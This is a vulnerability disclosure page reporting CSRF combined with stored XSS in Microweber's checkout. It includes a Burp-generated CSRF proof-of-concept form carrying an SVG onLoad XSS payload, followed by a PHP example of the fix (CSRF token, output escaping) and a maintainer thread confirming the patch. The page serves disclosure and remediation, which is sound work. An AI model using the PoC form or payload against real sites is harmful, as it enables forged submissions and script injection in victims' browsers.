Cross-site Scripting (XSS) - Stored in microweber/microweber


Reported on

Jun 25th 2021

✍️ Description

Hello, I found CSRF + XSS on the website, so the impact of the XSS could be presented.

There is no CSRF token or protection on: CSRF HTML PoC:

  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState('', '', '/')</script>
  <form action="" method="POST">
    <input type="hidden" name="first&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
    <input type="hidden" name="last&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
    <input type="hidden" name="email" value="asdf&#64;gmail&#46;com" />
    <input type="hidden" name="phone" value="000000000" />
    <input type="submit" value="Submit request" />
  </form>

When we submit the request, the XSS gets executed at the same time. Also, the personal information always stays there, so it counts as Stored XSS.

Video of me showing everything:

💥 Impact

JS executed in the victim's browser while the person is in Checkout
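The report describes two defects working together: the checkout POST accepts a cross-site form because no CSRF token is checked, and the submitted name fields are later rendered into the checkout page without escaping. The following is an added example, not code from the report or from the Microweber code base, showing the server-side shape of a fix for both: a per-session CSRF token compared in constant time, and HTML escaping applied at render time to the stored fields. The session is modelled as a plain PHP array, the hidden field name `_token` and all function names are assumptions, and the sample input is constructed to mirror the fields in the PoC form.

```php
<?php
declare(strict_types=1);

// Added example, not Microweber's code: a minimal checkout POST handler that
// closes both halves of the reported issue. (1) A per-session CSRF token is
// required, so a cross-site form cannot submit on the victim's behalf.
// (2) The stored customer fields are HTML-escaped every time they are
// rendered, so a payload such as "><svg onLoad=alert(5555)> is shown as text.
// Session storage is modelled as an array; the field name "_token" is assumed.

/** Returns the session's CSRF token, creating it on first use. */
function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Constant-time comparison of the submitted token against the session's. */
function csrfTokenIsValid(array $session, ?string $submitted): bool
{
    if (empty($session['csrf_token']) || $submitted === null || $submitted === '') {
        return false;
    }
    return hash_equals($session['csrf_token'], $submitted);
}

/** Escapes a value for insertion into HTML text or a quoted attribute. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Renders the stored customer details; escaping happens here, at output. */
function renderCheckoutSummary(array $customer): string
{
    $html = "<ul class=\"checkout-customer\">\n";
    foreach ($customer as $field => $value) {
        $html .= '  <li data-field="' . e($field) . '">' . e($value) . "</li>\n";
    }
    return $html . "</ul>\n";
}

/**
 * Handles the checkout POST. Returns [status, body] so the result is easy
 * to inspect; a real controller would build an HTTP response instead.
 */
function handleCheckoutPost(array &$session, array $post): array
{
    if (!csrfTokenIsValid($session, $post['_token'] ?? null)) {
        return ['status' => 403, 'body' => 'Missing or invalid CSRF token'];
    }

    // Allow-list the fields; anything else in the POST body is ignored.
    $customer = [];
    foreach (['first_name', 'last_name', 'email', 'phone'] as $field) {
        $customer[$field] = trim((string) ($post[$field] ?? ''));
    }
    if (filter_var($customer['email'], FILTER_VALIDATE_EMAIL) === false) {
        return ['status' => 422, 'body' => 'Invalid email address'];
    }

    // Store the raw values; they are neutralised at render time, not here.
    $session['customer'] = $customer;
    return ['status' => 200, 'body' => renderCheckoutSummary($customer)];
}

// Demo with constructed input that mirrors the report's form fields.
$session = [];
$token   = csrfToken($session);
$payload = '"><svg onLoad=alert(5555)>';
$fields  = [
    'first_name' => $payload,
    'last_name'  => $payload,
    'email'      => 'asdf@gmail.com',
    'phone'      => '000000000',
];

// A cross-site form cannot know the token, so this submission is rejected.
$forged = handleCheckoutPost($session, $fields);
echo "Forged POST -> HTTP {$forged['status']}\n";

// The site's own form carries the token; the payload is stored but inert.
$legit = handleCheckoutPost($session, $fields + ['_token' => $token]);
echo "Legitimate POST -> HTTP {$legit['status']}\n{$legit['body']}";
```

The two defences are independent: the token check alone would still leave a logged-in user who types a payload into their own name able to get script into the page, and escaping alone would still let a third-party page silently change the customer details on the victim's order. Escaping is done when the value is rendered rather than when it is stored, so the same stored data can be emitted safely into other contexts (JSON, email) with the encoder appropriate to each.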

a year ago


Hey kirareys, since I was not able to find a security policy or other method of contact, I've created an issue on the repo asking for a way to responsibly disclose this vulnerability. Waiting to hear back; good job!

We have contacted a member of the microweber team and are waiting to hear back (a year ago)
microweber/microweber maintainer validated this vulnerability (a year ago)
kirareys has been awarded the disclosure bounty
The fix bounty is now up for grabs
microweber/microweber maintainer confirmed that a fix has been merged on 846a63 (a year ago)
The fix bounty has been dropped
microweber/microweber maintainer
a year ago

Hello, thanks for the report. This is a valid issue and has been fixed now in this commit.

a year ago


Nice, thanks for the attention :) Regards
